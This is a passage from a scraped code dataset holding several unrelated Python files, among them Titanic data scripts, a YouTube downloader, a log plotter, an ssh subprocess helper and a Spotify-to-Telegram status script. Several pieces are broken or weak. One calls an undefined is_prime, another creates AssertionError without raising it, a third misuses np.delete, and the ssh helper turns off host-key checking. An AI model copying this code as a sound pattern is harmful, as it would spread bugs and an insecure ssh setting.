optim.Adam(trainable_param, lr=cfg.LEARNING_RATE,\n betas=(cfg.MOMENTUM, cfg.MOMENTUM_2), eps=cfg.EPS, weight_decay=cfg.WEIGHT_DECAY)\n else:\n AssertionError('optimizer can not be recognized.')\n return optimizer\n\n\n\ndef configure_lr_scheduler(optimizer, cfg):\n if cfg.SCHEDULER == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=cfg.STEPS[0], gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'multi_step':\n scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=cfg.STEPS, gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'exponential':\n scheduler = lr_scheduler.ExponentialLR(optimizer, gamma=cfg.GAMMA)\n elif cfg.SCHEDULER == 'SGDR':\n scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=cfg.MAX_EPOCHS)\n else:\n AssertionError('scheduler can not be recognized.')\n return scheduler\n\n","sub_path":"module/model/ssd_lite.py","file_name":"ssd_lite.py","file_ext":"py","file_size_in_byte":11882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190557578","text":"#-*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport sys,os\nsys.path.append(os.path.dirname(__file__))\n\nfrom titanic_preprocess import get_binned_data\n\ndef plot_train_test_histogram(col_name, titanic_all, bins=10):\n '''\n 学習用データと評価用データのヒストグラムを描画する\n\n Parameters\n ----------\n col_name : str\n ヒストグラムを描画する列名\n titanic_all : pd.DataFrame\n 全データ\n bins : int\n ヒストグラムのbinの数\n '''\n \n # ビン分割\n all_values = titanic_all[col_name]\n all_binned_values = get_binned_data(all_values, bins)\n \n train_flg = titanic_all['Type'] == 'train'\n train_binned_values = all_binned_values[train_flg]\n \n test_flg = titanic_all['Type'] == 'test'\n test_binned_values = all_binned_values[test_flg]\n \n # カテゴリごとに件数を集計\n train_plot_data = pd.DataFrame({'train': train_binned_values.value_counts().sort_index() / sum(train_flg)})\n test_plot_data = pd.DataFrame({'test': test_binned_values.value_counts().sort_index() / sum(test_flg)})\n \n all_plot_data = pd.DataFrame({'all': all_binned_values.value_counts().sort_index()})\n \n # 全体カテゴリのindexに合わせる\n train_plot_data = pd.concat([all_plot_data, train_plot_data], axis=1, sort=True).fillna(0)['train']\n test_plot_data = pd.concat([all_plot_data, test_plot_data], axis=1, sort=True).fillna(0)['test']\n \n x = np.arange(len(all_plot_data))\n w = 0.4\n \n plt.bar(x, train_plot_data, width=w, label='train', color='blue')\n plt.bar(x+w, test_plot_data, width=w, label='test', color='red')\n plt.xticks(x+w/2, all_plot_data.index, rotation=90)\n plt.legend(loc='best')\n\ndef plot_survival_rate(col_name, titanic_all, bins=10):\n '''\n 特徴量の値ごとの生存率を描画する\n\n Parameters\n ----------\n col_name : str\n ヒストグラムを描画する列名\n titanic_all : pd.DataFrame\n 全データ\n bins : int\n ヒストグラムのbinの数。valuesがstr型の場合は無視される\n '''\n \n # ビン分割\n all_values = titanic_all[col_name]\n all_binned_values = get_binned_data(all_values, bins=bins)\n\n train_flg = titanic_all['Type'] == 'train'\n train_binned_values = all_binned_values[train_flg]\n\n # カテゴリごとに集計する\n feature_df = pd.DataFrame({col_name : train_binned_values, 'Survived' : titanic_all['Survived']})\n survival_rate_df = feature_df.groupby(col_name).mean()\n count_df = feature_df.groupby(col_name).count()\n count_df.columns = ['count']\n \n category_survival_df = survival_rate_df.join(count_df)\n\n # ヒストグラムと生存率をplot\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n\n ax1.bar(category_survival_df.index, category_survival_df['count'], alpha=0.5)\n ax1.set_ylabel('count')\n ax1.set_xticklabels(category_survival_df.index, rotation=90)\n\n ax2 = ax1.twinx()\n ax2.plot(category_survival_df.index, category_survival_df['Survived'], color='red', label='Survival')\n ax2.set_ylabel('Survival rate')\n ax2.set_ylim([0, 1.2])\n ax2.legend(loc='best')\n\n ax1.set_title('Survival rate by {col}'.format(col=col_name))\n ax1.set_xlabel(col_name)\n\n print(category_survival_df.to_string(formatters={'Survived': '{:.1%}'.format}))\n","sub_path":"titanic_package/titanic_plot.py","file_name":"titanic_plot.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162081923","text":"import re\nimport youtube_dl\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef find_search_content(search):\n request = requests.get(\"https://www.youtube.com/results?search_query={}\".format(search))\n content = request.content\n soup = BeautifulSoup(content, \"html.parser\")\n return soup\n\n\ndef find_page_content(search):\n request = requests.get(\"https://www.youtube.com/results?{}\".format(search))\n content = request.content\n soup = BeautifulSoup(content, \"html.parser\")\n return soup\n\n\ndef find_video(soup, all_item, i=1):\n for element in soup.find_all('a', {\"rel\": \"spf-prefetch\"}):\n video_title = element.get('title')\n video_link = element.get('href')\n img_value = element.get('href').split(\"=\")[1]\n all_img = soup.find_all('img', {\"alt\": True, \"width\": True, \"height\": True, \"onload\": True, \"data-ytimg\": True})\n img = str(re.findall(\"https://i.ytimg.com/vi/{}/[\\S]+\".format(img_value), str(all_img))).strip(\"[\\\"\\']\")\n video_img = img.replace(\"&\", \"&\")\n all_item['{}'.format(i)] = {\"title\": video_title, \"link\": \"https://www.youtube.com{}\".format(video_link),\n \"img\": video_img}\n i = i + 1\n return all_item\n\n\ndef video_time(soup, all_item, i=1):\n for time in soup.find_all('span', {\"class\": \"video-time\"}):\n all_item.get('{}'.format(i))['time'] = time.text\n i = i + 1\n return all_item\n\n\ndef every_video(soup):\n all_item = {}\n find_video(soup, all_item, i=1)\n video_time(soup, all_item, i=1)\n return all_item\n\n\ndef page_bar(soup):\n page = {}\n for page_value in soup.find_all('a', {\"class\": True, \"data-visibility-tracking\": True, \"data-sessionlink\": True,\n \"aria-label\": True, }):\n page['{}'.format(page_value.text)] = page_value.get('href')\n\n return page\n\n\ndef download_mp3(url):\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n result = ydl.extract_info(\n url,\n download=False # We just want to extract the info\n )\n if 'entries' in result:\n # Can be a playlist or a list of videos\n video = result['entries'][0]\n else:\n # Just a video\n video = result\n\n print(video)\n video_url = video['url']\n print(video_url)\n\n request = requests.get(url) # get url\n cont = request.content # content 找出編碼\n soup = BeautifulSoup(cont, \"html.parser\") # (content,HTML 解析)\n\n title = soup.findAll('meta' ,{\"property\": 'og:title'})[0]['content']\n print('{}.mp3'.format(title))\n print(type(title))\n # title = str(title).format('\\n','').strip()\n print(title)\n\n return title\n\n\ndef download_mp4(url):\n print(url)\n ydl_opts = {'format': 'best'}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n","sub_path":"modles/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438739778","text":"from pycse import bvp\nimport numpy as np\n\n# example from http://200.13.98.241/~martin/irq/tareas1/bvp_paper.pdf\n\n\ndef odefun(Y, x):\n u, v, w, z, y = Y. T\n dudx = 0.5 * u * (w - u) / v\n dvdx = -0.5 * (w - u)\n dwdx = (0.9 - 1000 * (w - y) - 0.5 * w * (w - u)) / z\n dzdx = 0.5 * (w - u)\n dydx = -100.0 * (y - w)\n return np.column_stack([dudx, dvdx, dwdx, dzdx, dydx])\n\n\ndef bcfun(Y):\n # u(0) = v(0) = w(0) = 1, z(0) = -10, w(1) = y(1)\n ua, va, wa, za, ya = Y[0, :]\n ub, vb, wb, zb, yb = Y[-1, :]\n z1 = ua - 1\n z2 = va - 1\n z3 = wa - 1\n z4 = za + 10\n z5 = wb - yb\n return [z1, z2, z3, z4, z5]\n\nx = np.linspace(0, 1)\n\n# initial guess\nux = x**0\nvx = x**0\nwx = -4.5 * x**2 + 8.91 * x + 1\nzx = -10 * x**0\nyx = -4.5*x**2 + 9*x + 0.91\n\nYinit = np.column_stack([ux, vx, wx, zx, yx])\n\nsol = bvp(odefun, bcfun, x, Yinit)\n\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nu = sol[:, 0]\nv = sol[:, 1]\nw = sol[:, 2]\nz = sol[:, 3]\ny = sol[:, 4]\n\nplt.plot(x, u, x, v, x, w, x, z + 10, x, y)\nplt.legend(['u', 'v', 'w', 'z', 'y'], loc='best')\nplt.show()\n","sub_path":"pycse/tests/test_bvp.py","file_name":"test_bvp.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"132995622","text":"\n\nfrom xai.brain.wordbase.verbs._twist import _TWIST\n\n#calss header\nclass _TWISTS(_TWIST, ):\n\tdef __init__(self,): \n\t\t_TWIST.__init__(self)\n\t\tself.name = \"TWISTS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"twist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_twists.py","file_name":"_twists.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"436067159","text":"from Crawler.TweetCrawler import load_new_tweets, load_testset_accounts, insert_testset_tweets\nfrom Utility.Twitter import get_twitter_api\n\napi = get_twitter_api()\n\n#---------load-collected-accounts------------------------\n# # real\n# print(\"Load real news...\")\nload_new_tweets(api, fake=False)\n# # fake\n# print(\"Load fake news...\")\nload_new_tweets(api, fake=True)\n\n#---------load-testset-accounts--------------------------\n# load accounts from tweets of POLITIFACT category 'false' and 'pants on fire'\n# load_testset_accounts(api, fake=True)\n\n# load accounts from tweets of POLITIFACT category 'true'\n# load_testset_accounts(api, fake=False)\n\n#--------load-testset-tweets-----------------------------\n# insert fake news tweets\ninsert_testset_tweets(api, True)\n# insert real news tweets\ninsert_testset_tweets(api, False)\n","sub_path":"Crawler/CrawlerMain.py","file_name":"CrawlerMain.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"252555559","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport os\nimport sys\nfrom enum import IntEnum\n\n\nclass LogColum(IntEnum):\n ELAPSED = 0\n NODE_NUM = 1\n FUNCTION = 2\n INFO = 3\n INFO_ = 4\n SERVICE_NAME = 5\n SERVER_IP = 6\n CLIENT_IP = 7\n NOW_TIME = 8\n SENT_TIME = 9\n LATENCY = 10\n\n\ndef get_service_name(lines):\n s_l = [s.strip() for s in lines]\n service_names = []\n for l in s_l:\n line = l.split(' ')\n service_names.append(line[LogColum.SERVICE_NAME])\n return [x for x in set(service_names) if service_names.count(x) > 1]\n\n\ndef get_join_ips(lines, service_name):\n s_l = [s.strip() for s in lines]\n ips = []\n for l in s_l:\n line = l.split(' ')\n if (service_name == line[LogColum.SERVICE_NAME]):\n ips.append(line[LogColum.CLIENT_IP])\n return [ip for ip in set(ips) if ips.count(ip) > 1]\n\n# log[lines][count]\n\n\ndef get_max_time(time):\n return max(time)\n\n\ndef latency(time, latency):\n order = 1_000_000\n count = int(math.floor(get_max_time(time) / order))\n summarized_time = np.arange(count)\n summarized_latency = np.empty(count)\n for i in summarized_time:\n time_seconds = i * order\n applicable_latency = latency[(\n (time >= time_seconds) & (time < (time_seconds + order)))]\n if (len(applicable_latency) == 0):\n summarized_latency[i] = 0\n continue\n summarized_latency[i] = sum(\n applicable_latency) / len(applicable_latency)\n return (summarized_time, summarized_latency)\n\n\ndef variance(time, latency):\n order = 1_000_000\n count = int(math.floor(get_max_time(time) / order))\n # summary秒で集約\n summary = 1\n summarized_time = np.arange(0, count, summary)\n summarized_variance = np.empty(len(summarized_time))\n for index, i in enumerate(summarized_time):\n time_seconds = i * order\n applicable_latency = latency[(\n (time >= time_seconds) & (time < (time_seconds + (order*summary))))]\n if (len(applicable_latency) == 0):\n summarized_variance[i] = 0\n continue\n ave = sum(\n applicable_latency) / len(applicable_latency)\n squared_diff = [(i - ave) ** 2 for i in applicable_latency]\n summarized_variance[index] = sum(squared_diff) / len(squared_diff)\n return (summarized_time, summarized_variance)\n\n# 指定したサービスのログを抜き出す\n\n\ndef get_log(log, service_name):\n time = []\n latency = []\n for l in log:\n if l[LogColum.SERVICE_NAME] == service_name:\n time.append(float(l[LogColum.NOW_TIME]))\n latency.append(float(l[LogColum.LATENCY]))\n # latencyがμ秒なのでm秒に治す.\n order = 1_000\n return (np.array(time), np.array(latency)/order)\n\n\ndef get_log_with_ip(log, service_name, ip):\n # return log_time[\"service_name\"][\"ip\"]\n # return log_latency[\"service_name\"][\"ip\"]\n time = []\n latency = []\n for l in log:\n if l[LogColum.SERVICE_NAME] == service_name and l[LogColum.CLIENT_IP] == ip:\n time.append(float(l[LogColum.NOW_TIME]))\n latency.append(float(l[LogColum.LATENCY]))\n # latencyがμ秒なのでm秒に治す.\n order = 1_000\n return (np.array(time), np.array(latency)/order)\n\n\ndef load_file(file_name):\n path = 'arranged_log/'+file_name + '.log'\n log_time = {}\n log_latency = {}\n service_names = []\n with open(path) as f:\n lines = f.readlines()\n service_names = get_service_name(lines)\n log = [s.strip().split(' ') for s in lines]\n for s in service_names:\n log_time[s], log_latency[s] = get_log(log, s)\n return service_names, log_time, log_latency\n\n\ndef load_file_with_ip(file_name):\n path = 'arranged_log/'+file_name + '.log'\n # log_time[\"service_name\"][\"ip\"]\n # log_latency[\"service_name\"][\"ip\"]\n log_time = {}\n log_latency = {}\n service_names = []\n # join_ips[service_name] = []\n join_ips = {}\n with open(path) as f:\n lines = f.readlines()\n service_names = get_service_name(lines)\n log = [s.strip().split(' ') for s in lines]\n for s in service_names:\n log_time[s] = {}\n log_latency[s] = {}\n join_ips[s] = get_join_ips(lines, s)\n for ip in join_ips[s]:\n log_time[s][ip], log_latency[s][ip] = get_log_with_ip(\n log, s, ip)\n return service_names, join_ips, log_time, log_latency\n\n\ndef plot_std(file_name):\n # log[servicename][count][0] = time\n # log[servicename][count][1] = latency\n service_names, log_time, log_latency = load_file(file_name)\n color = {\n \"serviceB\": \"#1f77b4\",\n \"serviceA\": \"#ff7f0e\",\n }\n for service_name in service_names:\n x, y = variance(log_time[service_name], log_latency[service_name])\n y = y**0.5\n # プロット\n plt.plot(x, y, label=service_name, color=color[service_name])\n\n # 凡例の表示\n plt.legend()\n\n plt.title('Change in Standard deviation of Latency')\n\n # ラベル名\n plt.ylabel('Standard deviation of Latency (ms)')\n plt.xlabel('elapsed time (s)')\n\n makedir(file_name)\n # プロット表示(設定の反映)\n plt.savefig('figure/'+file_name + '/std.png')\n plt.clf()\n return\n\n\ndef plot_latency(file_prefix):\n pers = ['0', '20', '60', '100']\n for per in pers:\n file_name = file_prefix + '-' + per + 'per'\n # log[servicename][count][0] = time\n # log[servicename][count][1] = latency\n service_names, log_time, log_latency = load_file(file_name)\n for service_name in service_names:\n x, y = latency(log_time[service_name], log_latency[service_name])\n # プロット\n plt.plot(x, y, label=service_name+'-'+per + 'per')\n\n # 凡例の表示\n plt.legend()\n\n plt.title('Change in Latency')\n\n # ラベル名\n plt.ylabel('Service RTT (ms)')\n plt.xlabel('elapsed time (s)')\n\n makedir(file_prefix)\n # プロット表示(設定の反映)\n plt.savefig('figure/'+file_prefix + '/latency.png')\n plt.clf()\n return\n\n\ndef plot_lands(file_name):\n service_names, log_time, log_latency = load_file(file_name)\n color = {\n \"latency\": \"#1f77b4\",\n \"std\": \"#ff7f0e\",\n }\n for service_name in service_names:\n std_x, std_y = variance(\n log_time[service_name], log_latency[service_name])\n std_y = std_y ** 0.5\n x, y = latency(log_time[service_name], log_latency[service_name])\n plt.plot(x, y, label=\"latency\",\n color=color[\"latency\"])\n # プロット\n plt.plot(std_x, std_y, label=\"std\",\n color=color[\"std\"])\n # 凡例の表示\n plt.legend()\n\n plt.title('Change in Standard deviation of Latency and std')\n\n # ラベル名\n plt.ylabel('Standard deviation of Latency and Latency (ms)')\n plt.xlabel('elapsed time (s)')\n\n makedir(file_name)\n # プロット表示(設定の反映)\n plt.savefig('figure/'+file_name + '/' +\n service_name+'-latency-and-std.png')\n plt.clf()\n return\n\n\ndef plot_ip_latency(file_name):\n # log_time[service_name][ip]\n # log_latency[service_name][ip]\n service_names, join_ips, log_time, log_latency = load_file_with_ip(\n file_name)\n for service_name in service_names:\n for join_ip in join_ips[service_name]:\n x, y = latency(log_time[service_name][join_ip],\n log_latency[service_name][join_ip])\n plt.plot(x, y, label=join_ip)\n # 凡例の表示\n plt.legend()\n\n plt.title('Change in Latency of ' + service_name)\n\n # ラベル名\n plt.ylabel('Service RTT (ms)')\n plt.xlabel('elapsed time (s)')\n\n makedir(file_name)\n # プロット表示(設定の反映)\n plt.savefig('figure/'+file_name + '/'+service_name+'_latency.png')\n plt.clf()\n return\n\n\ndef makedir(file_name):\n os.makedirs('figure/'+file_name, exist_ok=True)\n return\n\n\ndef arrange_log(file_name):\n pers = ['0', '20', '40', '60', '80', '100']\n for per in pers:\n path = 'raw_log/'+file_name+'-'+per+'per.log'\n\n latency_log = 'arranged_log/'+file_name + '-'+per+'per.log'\n other_log = 'arranged_log/'+file_name + '-'+per+'per_others.log'\n\n latency_file = open(latency_log, mode='w')\n other_file = open(other_log, mode='w')\n\n with open(path) as f:\n lines = [s.strip() for s in f.readlines()]\n for l in lines:\n s_l = l.split(' ')\n if len(s_l) < LogColum.INFO:\n other_file.write(l+'\\n')\n continue\n if s_l[LogColum.FUNCTION] == \"KmdEchoClientApplication:HandleRead():\" and s_l[LogColum.INFO] == \"[INFO\":\n latency_file.write(l+'\\n')\n else:\n other_file.write(l+'\\n')\n\n latency_file.close()\n other_file.close()\n\n\ndef get_file_name(file_path):\n return os.path.splitext(os.path.basename(file_path))[0]\n\n\nargs = sys.argv\n# file_name example is usecase2\nfile_name = get_file_name(args[1])\n\narrange_log(file_name)\nplot_latency(file_name)\n","sub_path":"usecase2.py","file_name":"usecase2.py","file_ext":"py","file_size_in_byte":9310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105606132","text":"#!/usr/bin/env python\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\n##### trzeba zrobić tablicę i wypunktować wszystkie powtórzenia wszystkiego to będzie miliard razy szybcie no tylko klika kilo ramu zje\n\n\ndef get_result():\n result = 0\n for i in range(2, 2000000):\n if i % 10000 == 0:\n print(i)\n if is_prime(i):\n result += i\n return result\n\n\nprint(get_result())\n","sub_path":"10.SumOfPrimes.py","file_name":"10.SumOfPrimes.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"6223422","text":"\"\"\" Writing my first randomforest code.\nAuthor : AstroDave\nDate : 23rd September, 2012\nplease see packages.python.org/milk/randomforests.html for more\n\n\"\"\" \n\nimport numpy as np\nimport csv as csv\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import GradientBoostingRegressor\n\ncsv_file_object = csv.reader(open('train.csv', 'rb')) #Load in the training csv file\nheader = csv_file_object.next() #Skip the fist line as it is a header\ntrain_data=[] #Creat a variable called 'train_data'\nfor row in csv_file_object: #Skip through each row in the csv file\n train_data.append(row) #adding each row to the data variable\ntrain_data = np.array(train_data) #Then convert from a list to an array\n\n#I need to convert all strings to integer classifiers:\n#Male = 1, female = 0:\ntrain_data[train_data[0::,3]=='male',3] = 1\ntrain_data[train_data[0::,3]=='female',3] = 0\n#embark c=0, s=1, q=2\ntrain_data[train_data[0::,10] =='C',10] = 0\ntrain_data[train_data[0::,10] =='S',10] = 1\ntrain_data[train_data[0::,10] =='Q',10] = 2\n\ntrain_data = np.delete(train_data,[2,7,9],1) #remove the name data, cabin and ticket\n#I need to do the same with the test data now so that the columns are in the same\n#as the training data\n\n#I need to fill in the gaps of the data and make it complete.\n#So where there is no price, I will assume price on median of that class\n#Where there is no age I will give predicted value of age\nage_predict = train_data[0::,3]\nage_data = np.delete(train_data,[3],10)\nage_predict_paired = age_predict\nage_data_paired = age_data\n\n\nraw_input(\".\")\t\ngb_age = GradientBoostingRegressor().fit(age_data_paired,age_predict_paired)\nage_output = gb_age.predict(age_data)\nj = 0\nfor rows in train_data:\n\tif(row[3]==''):\n\t\trow[3] = age_output[j]\n\tj += 1\n\n#All missing embarks just predict where they're coming from:\nem_predict = train_data[0::,7]\nem_data = np.delete(train_data[0::,7],1)\nem_predict_paired = em_predict\nem_data_paired = em_data\ni = 0\nfor row in em_predict_paired:\n\tif(em_predict_paired[7] == ''):\n\t\tnp.delete(em_predict_paired[i,0::],1)\n\t\tnp.delete(em_data_paired[i,0::],1)\n\ti += 1\ngb_em = GradientBoostingRegressor().fit(em_data_paired,em_predict_paired)\nem_output = gb_em.predict(em_data)\nj = 0\nfor rows in train_data:\n\tif(row[7]==''):\n\t\trow[7] = em_output[j]\n\tj += 1\n\n\ntest_file_object = csv.reader(open('test.csv', 'rb')) #Load in the test csv file\nheader = test_file_object.next() #Skip the fist line as it is a header\ntest_data=[] #Creat a variable called 'test_data'\nfor row in test_file_object: #Skip through each row in the csv file\n test_data.append(row) #adding each row to the data variable\ntest_data = np.array(test_data) #Then convert from a list to an array\n\n#I need to convert all strings to integer classifiers:\n#Male = 1, female = 0:\ntest_data[test_data[0::,2]=='male',2] = 1\ntest_data[test_data[0::,2]=='female',2] = 0\n#ebark c=0, s=1, q=2\ntest_data[test_data[0::,9] =='C',9] = 0 #Note this is not ideal, in more complex 3 is not 3 tmes better than 1 than 2 is 2 times better than 1\ntest_data[test_data[0::,9] =='S',9] = 1\ntest_data[test_data[0::,9] =='Q',9] = 2\n\ntest_data = np.delete(test_data,[1,6,8],1) #remove the name data, cabin and ticket\n\n#All the ages with no data make the median of the data\nage_predict = test_data[0::,2]\nage_data = np.delete(test_data[0::,2],1)\nage_predict_paired = age_predict\nage_data_paired = age_data\ni = 0\nfor row in age_predict_paired:\n\tif(age_predict_paired[2] == ''):\n\t\tnp.delete(age_predict_paired[i,0::],1)\n\t\tnp.delete(age_data_paired[i,0::],1)\n\ti += 1\ngb_age = GradientBoostingRegressor().fit(age_data_paired,age_predict_paired)\nage_output = gb_age.predict(age_data)\nj = 0\nfor rows in test_data:\n\tif(row[2]==''):\n\t\trow[2] = age_output[j]\n\tj += 1\n\n#All missing embarks just predict where they're coming from:\nem_predict = test_data[0::,6]\nem_data = np.delete(test_data[0::,6],1)\nem_predict_paired = em_predict\nem_data_paired = em_data\ni = 0\nfor row in em_predict_paired:\n\tif(em_predict_paired[6] == ''):\n\t\tnp.delete(em_predict_paired[i,0::],1)\n\t\tnp.delete(em_data_paired[i,0::],1)\n\ti += 1\ngb_em = GradientBoostingRegressor().fit(em_data_paired,em_predict_paired)\nem_output = gb_em.predict(em_data)\nj = 0\nfor rows in test_data:\n\tif(row[6]==''):\n\t\trow[6] = em_output[j]\n\tj += 1\n\n\n\n\n#The data is now ready to go. So lets train then test!\n# Random FOREST\n# print 'Training '\n# forest = RandomForestClassifier(n_estimators=100)\n\n# forest = forest.fit(train_data[0::,1::],\\\n # train_data[0::,0])\n\n# print 'Predicting'\n# output = forest.predict(test_data)\n\ngb = GradientBoostingClassifier().fit(train_data[0::,1::],\\\n train_data[0::,0])\n\noutput = gb.predict(test_data)\n\t\t\t\t\t\nopen_file_object = csv.writer(open(\"myfirstgb.csv\", \"wb\"))\ntest_file_object = csv.reader(open('test.csv', 'rb')) #Load in the csv file\n\n\ntest_file_object.next()\ni = 0\nfor row in test_file_object:\n row.insert(0,output[i].astype(np.uint8))\n open_file_object.writerow(row)\n i += 1\n \n","sub_path":"src/Titanic/myfirstforest.py","file_name":"myfirstforest.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238123229","text":"import subprocess\nimport os\nfrom sykle.config import Config\n\n\nclass CancelException(Exception):\n pass\n\n\nclass NonZeroReturnCodeException(Exception):\n def __init__(self, process):\n self.process = process\n self.message = 'Process returned a non zero returncode'\n\n def __str__(self):\n return self.message\n\n\ndef call_subprocess(command, env=None, debug=False, target=None):\n \"\"\"\n This is a utility function that will spawn a subprocess that runs the\n command passed in to the command argument.\n\n Parameters:\n command (array[str]): the command to run as a subprocess\n env (dict): an optional dictionary of env vars to specify for command.\n values in env can references local environment variables.\n EX: env can be {'TEST': '$TEST_VAL'}\n debug (bool): if true, will output the command as given and the env\n vars used\n target (string): an optional ssh address specifying where to run the\n command (runs locally if not specified)\n NOTE: env vars will be interpolated based on LOCAL\n environment variables, not TARGET environment\n variables.\n \"\"\"\n if env:\n # NB: we want the entire environment specified here\n full_env = os.environ.copy()\n env = Config.interpolate_env_values(env, os.environ)\n full_env.update(env)\n\n cmd = command\n if target:\n if env:\n cmd = [\"{}={}\".format(k, v) for k, v in env.items()] + cmd\n cmd = ['ssh', '-o', 'StrictHostKeyChecking=no', target] + cmd\n\n full_command = ' '.join(cmd)\n\n if debug:\n print('--BEGIN COMMAND--')\n print('COMMAND:', full_command)\n print('--END COMMAND--')\n\n try:\n if env:\n p = subprocess.Popen(full_command, env=full_env, shell=True)\n else:\n p = subprocess.Popen(full_command, shell=True)\n p.wait()\n if p.returncode != 0:\n raise NonZeroReturnCodeException(process=p)\n except KeyboardInterrupt:\n p.wait()\n raise CancelException()\n","sub_path":"sykle/call_subprocess.py","file_name":"call_subprocess.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136039484","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-x86_64/egg/django_evolution/builtin_evolutions/auth_unique_together_baseline.py\n# Compiled at: 2018-06-14 23:17:51\nfrom django_evolution.mutations import ChangeMeta\nMUTATIONS = [\n ChangeMeta('Permission', 'unique_together', [\n ('content_type', 'codename')])]","sub_path":"pycfiles/django_evolution-0.7.8-py2.7/auth_unique_together_baseline.py","file_name":"auth_unique_together_baseline.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"112198261","text":"#!/usr/bin/env python\n#==============================================================================\n#\n# This file is a part of Notalon (http://notalon.org).\n#\n# File: archive.py\n# Description: Wrapper for NEME files (zip files with a phatter extension).\n# Author: Saketh Bhamidipati \n# \n# Copyright (C) 2006-2009 Saketh Bhamidipati.\n#\n#==============================================================================\n\nimport sys\nimport zipfile\nimport os\n\nclass Archive:\n \"\"\"Wrapper for the Python `zipfile` library. \n \n \"\"\"\n def __init__(self, filename):\n self.zip = zipfile.ZipFile(filename)\n\n def get(self, objname):\n \"\"\"Returns an object with the specified name from the archive. \n\n If no such object is found, returns None.\n \n \"\"\"\n for name in self.zip.namelist():\n if name == objname:\n return self.zip.read(name)\n\n # If nothing\n return None\n\n","sub_path":"OpenSource Examples/notalon/notalonlib/resource/archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"304334704","text":"\n\nfrom xai.brain.wordbase.nouns._windmill import _WINDMILL\n\n#calss header\nclass _WINDMILLS(_WINDMILL, ):\n\tdef __init__(self,): \n\t\t_WINDMILL.__init__(self)\n\t\tself.name = \"WINDMILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"windmill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_windmills.py","file_name":"_windmills.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"246304980","text":"import time\r\nimport typing\r\nimport spotipy\r\nimport config\r\nfrom spotipy.oauth2 import SpotifyOAuth\r\nfrom telethon.sync import TelegramClient\r\nfrom telethon import functions, types\r\n\r\napi_id = config.api_id\r\napi_hash = config.api_hash\r\n\r\nspotify = spotipy.Spotify(\r\n\tauth_manager=SpotifyOAuth(\r\n\t\tscope=\"user-read-currently-playing\",\r\n\t\tclient_id=config.client_id,\r\n\t\tclient_secret=config.client_secret,\r\n\t\tredirect_uri=config.redirect_uri,\r\n\t\tusername=config.spotiusername,\r\n\t)\r\n)\r\n\r\n\r\ncurrent_playing = typing.List[typing.Union[str, str, str]]\r\n\r\ndef update_status(_current_playing):\r\n\tcurrent = spotify.current_user_playing_track()\r\n\tif not current is None:\r\n\r\n\t\ttrack = current[\"item\"][\"name\"]\r\n\t\talbum = current[\"item\"][\"album\"][\"name\"]\r\n\t\tartist = current[\"item\"][\"artists\"][0][\"name\"]\r\n\r\n\t\tif _current_playing != [track, album, artist]:\r\n\t\t\tmuzon = \"🎧 Spotify | \" + artist + \" - \" + track\r\n\t\t\t\r\n\t\t\twith TelegramClient('anon', api_id, api_hash) as client:\r\n\t\t\t\tresult = client(functions.account.UpdateProfileRequest(about=muzon))\r\n\t\t\tprint(f\"🎧 Spotify | {track} - {artist}\")\r\n\r\n\t\treturn [track, album, artist]\r\n\r\n\tif not _current_playing is 